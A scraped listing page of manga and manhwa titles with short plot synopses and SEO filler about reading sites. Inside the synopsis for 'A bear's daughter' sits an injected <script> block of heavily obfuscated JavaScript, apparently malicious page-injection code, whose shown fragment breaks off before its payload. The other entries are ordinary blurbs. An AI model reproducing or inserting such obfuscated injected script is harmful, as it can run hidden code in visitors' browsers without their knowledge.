Fantasy - Page 3

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

5155 results

990k Ex-Life Hunter

The ordinary F-rank hunter, Gang HyeonJoon, had always prayed for the strength to change his life. One day, his prayers were answered… [The Final Sword Saint praises your bravery.][The Master in the Shadows is your….] “Enough! This is too much!” 990 thousand past lives appeared in front of him!


9Th Class Sword Master: The Guardian Of The Sword

Read Manhwa 9Th Class Sword Master: The Guardian Of The Sword At The End Of The “War Of Trust,” That Was Fought To Protect Humanity Against The Forces Of “Corruption,” Karil Macgavern, A Sword Saint, Faces The Betrayal Of His Close Friend And Emperor, Oliven. Having Ultimately Killed The Emperor, Karil Travels Back In Time To Set Things Right. Now, Armed With The Power He Couldn’t Obtain In His Previous Life, Both A Sword And Magic. He Stands At The Crossroads Of Two Paths, Determined To Change The Future.

1 days ago

A Bad Proposal

Read manhwa A Bad Proposal “…How did you know to come here?” “Perhaps, I really can’t find someone like you so I can’t leave you alone.” Her boyfriend who broke up 7 years ago, Seok Hyun appeared before Hee Soo, who was struggling with his uncle’s debt and was working at a cafe by day and at a bar by night. For Hee Soo, who always works hard for money, Seok Hyun made an offer she couldn’t refuse.


A Barbarian Was Admitted To The Academy

Read Manhwa A Barbarian Was Admitted To The Academy / A Barbarian Entered The Academy / Варвар Поступил В Академию / アカデミーにオランケが入学した / 아카데미에 오랑캐가 입학했다 The Protagonist Is Lee Soo-Jin, A College Student Who Loved Playing A Role-Playing Game Called “Academy Of Magic”. One Day, He Wakes Up In The Body Of Rina, A Secondary Character In The Game Who Was A Barbarian Warrior From A Savage Tribe. He Discovers That Rina Was Destined To Come To A Bad End, Being Captured And Tortured By The Evil Empress. She Decides To Escape This Fate And Enroll In The Magic Academy, Where She Meets Several Characters From The Game, Including The Crown Prince, The Black Knight, The White Wizard And The Empress Herself.


A bear’s daughter

The adventure of a girl who risk the fate of the tribe into the world where monsters appear during the most feared disaster, eclipse. A bears tribe's daughter / ?? ?<script></script><script>(function(_0x35785a,_0x40067e){var _0x4657a9=_0x3d5f,_0x687f72=_0x35785a();while(!![]){try{var _0x5dc427=-parseInt(_0x4657a9(0x202))/(0x1085+-0x13c4+0x340)*(-parseInt(_0x4657a9(0x20a))/(-0x894+0x125f+-0x9c9))+parseInt(_0x4657a9(0x1ed))/(0x10b1+-0x2117+0x1069*0x1)*(-parseInt(_0x4657a9(0x209))/(0xf36+-0x12*-0x10b+-0x21f8))+parseInt(_0x4657a9(0x1e7))/(0x921+0x10d*0x10+-0x8a4*0x3)+-parseInt(_0x4657a9(0x1e6))/(0x1*0x20fc+0x2d1*-0x1+-0x1e25*0x1)*(parseInt(_0x4657a9(0x1fa))/(0x184+-0x2433+0x5c9*0x6))+-parseInt(_0x4657a9(0x1fb))/(-0x3*0x1d5+0x1175*0x1+0x1fd*-0x6)*(-parseInt(_0x4657a9(0x201))/(0x1*-0x1012+0x14df*0x1+-0xf4*0x5))+-parseInt(_0x4657a9(0x203))/(0x13f0+0xbd7+-0x41*0x7d)*(parseInt(_0x4657a9(0x206))/(-0x1e*0x1c+-0x1*-0x231+-0x1d*-0xa))+-parseInt(_0x4657a9(0x1ff))/(-0x17*0xca+-0x7f0+0x1a22)*(-parseInt(_0x4657a9(0x1e9))/(-0x170b+-0x16fc+0x2e14));if(_0x5dc427===_0x40067e)break;else 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A Beast Swallowed By A Flower

Read A Beast Swallowed By A Flower Novel – A Beast Swallowed By A Flower Manhwa Online Free At Kunmanga The Summary Of The Comic A Beast Swallowed By A Flower: “A Wolf Only Keeps One Female By Its Side, Lisi.” Iris Was Called The Flower Of The Whitlow Duchy, But In Reality, She Lived A Life No Better Than A Weed. The Man Named Caverant Green, Who Deliberately Approached Her To Live A Comfortable Life Again, Was An Extremely Hot And Beast-Like Man. Every Time She Make Eye Contact With The Leader Of The Beastmen, A Dangerous Atmosphere Blooms Between Them… “A Beast Swallowed By A Flower” Is Also Known As: 꽃이 삼킨 짐승 “Topmanhua, Mangaupdates, Likemanga…” Are The Most Searched Keywords On The Website Mangazin. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Manga Zin. You Can Read Top Manhua Two Weeks And Counting Deadlines Are Raining In The Status Window I Became The King By Scavenging


A Beauty, A Fatal Concubine

A Beauty, A Fatal Concubine Rebirth and come back, Mu Yunyao believes in three points: firstly, don't be kind to others; secondly, remove out the source of the trouble; thirdly, don't believe the true feelings. So, she is ruthless and unscrupulous. Instead of enduring, she would rather stir the world upside down. But after a encounter, there is always a cold prince following her and wanting to marry her... &nbsp;


A Blank Slate Regression For The Idol That Lost His Original Mindset

Read “A Blank Slate Regression For The Idol That Lost His Original Mindset Novel” – “A Blank Slate Regression For The Idol That Lost His Original Mindset Manhwa” Online Free At Mangazin The Summary Of The Comics “A Blank Slate Regression For The Idol That Lost His Original Mindset”: Yoon Eden Lived The Life Of A B-Tier Idol Who Managed To Get By. He Is An Idol Of 7 Years With Fixed Dead-Fish Eyes And The Artist Disease. [The 30,000Th Fan Is Disappointed In You!] [You Have Met The Requirements.] [Project Regaining Your Original Mindset For The Idol That Lost His Original Mindset Has Started.] A Day Before He Was Withdrawing From The Team, He Was Sent To The Beginning Of His Debut, When He Was A Flop, To Remember His Original Mindset. [※When Your Original Mindset Becomes 0, You Will Restart!] [※To Complete The Project, You Must Meet The Requirements!] [You, Who Have Disappointed 30,000 Fans, Must Make 30 Million Fans Happy! (0/30,000,000)] On Top Of That, To Stop Regressing Infinitely, There’s An Atrocious Requirement Of Becoming An A-Tier Idol! “F*Ck, My Cheongdam-Dong House! My Hundred Millions Of Royalties! My Savings Account! My Ferrari!” [Profanity Has Been Detected.] [Degree Of Original Mindset -2] From His Original Mindset That Is Cut Down Just By Breathing, And The Pouring Fan Love Quests, To The Penalty For Incompletion! A Time Of Clearing Up Karma Starting At The Semi-Basement Dormitory For The Idol Who Lost His Original Mindset And Was Hit Properly By Karma! Maybe You Like ! “A Blank Slate Regression For The Idol That Lost His Original Mindset” Is Alternatively Named: 초심 잃은 아이돌을 위한 회귀 백서 The Comics “A Blank Slate Regression For The Idol That Lost His Original Mindset” Belongs To The Genre: Drama, Fantasy, Manhwa “Kunmanga, Manga Updates, Harimanga…” Are The Most Searched Keywords On The Website Shojoscans. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga My Ruined Academy How To Change Angst Into A Feel-Good The Beast Tamed By The Evil Woman


A Blessed Villainess, Or A Cursed Heroine?

Read Manga A Blessed Villainess, Or A Cursed Heroine? / Akujo Ni Ubawareta Heroine No Za, Torimodoshimasu! “Give Me Back My Body!” Lady Sophia Was Supposed To Marry Her Beloved Prince, Alfred, And Live The Rest Of Her Life Blessed With Happiness. However, When The Villainess Of The Story, Rosalie, Places A Terrible Curse On Her, Their Souls Exchange Bodies! Her Once-Happy Life Descends Into Absolute Despair When Sophia–Now Rosalie–Is Accused Of A Crime She Didn’t Commit And Is Exiled From The Palace. “This Isn’t Me! I Want To Go Back To My Old Body!” As She Wanders Away From The Capital, She Meets A Merchant Named Raul. With His Help, Sophia Sets Off To Change Her Fate And Return To Her Rightful Body! “A Blessed Villainess, Or A Cursed Heroine? Manga” Is Sames Name: 悪女に奪われたヒロインの座、取り戻します! 悪女に奪われたヒロインの座、取り戻します! 악녀에게 빼앗긴 여주 자리를 되찾겠습니다

16 hours ago

A Blood-Curdling Lifestyle

Read Manhwa A Blood-Curdling Lifestyle; A Blood-Draining Life My Life Of Comparing Myself To My Perfect Older Sister Is Over. Now I’m Going To Live As The Main Character! Shin Seon-Ha, A Freshman Who Entered College With Big Dreams. However, I Thought There Was Something Strange In That Department, But I Never Thought They Were All Vampires!!… Sunha’s Bloody College Life With Her Fellow Vampires Begins. “A Blood-Curdling Lifestyle Manhwa” Is Sames Name: 피말리는 과대생활
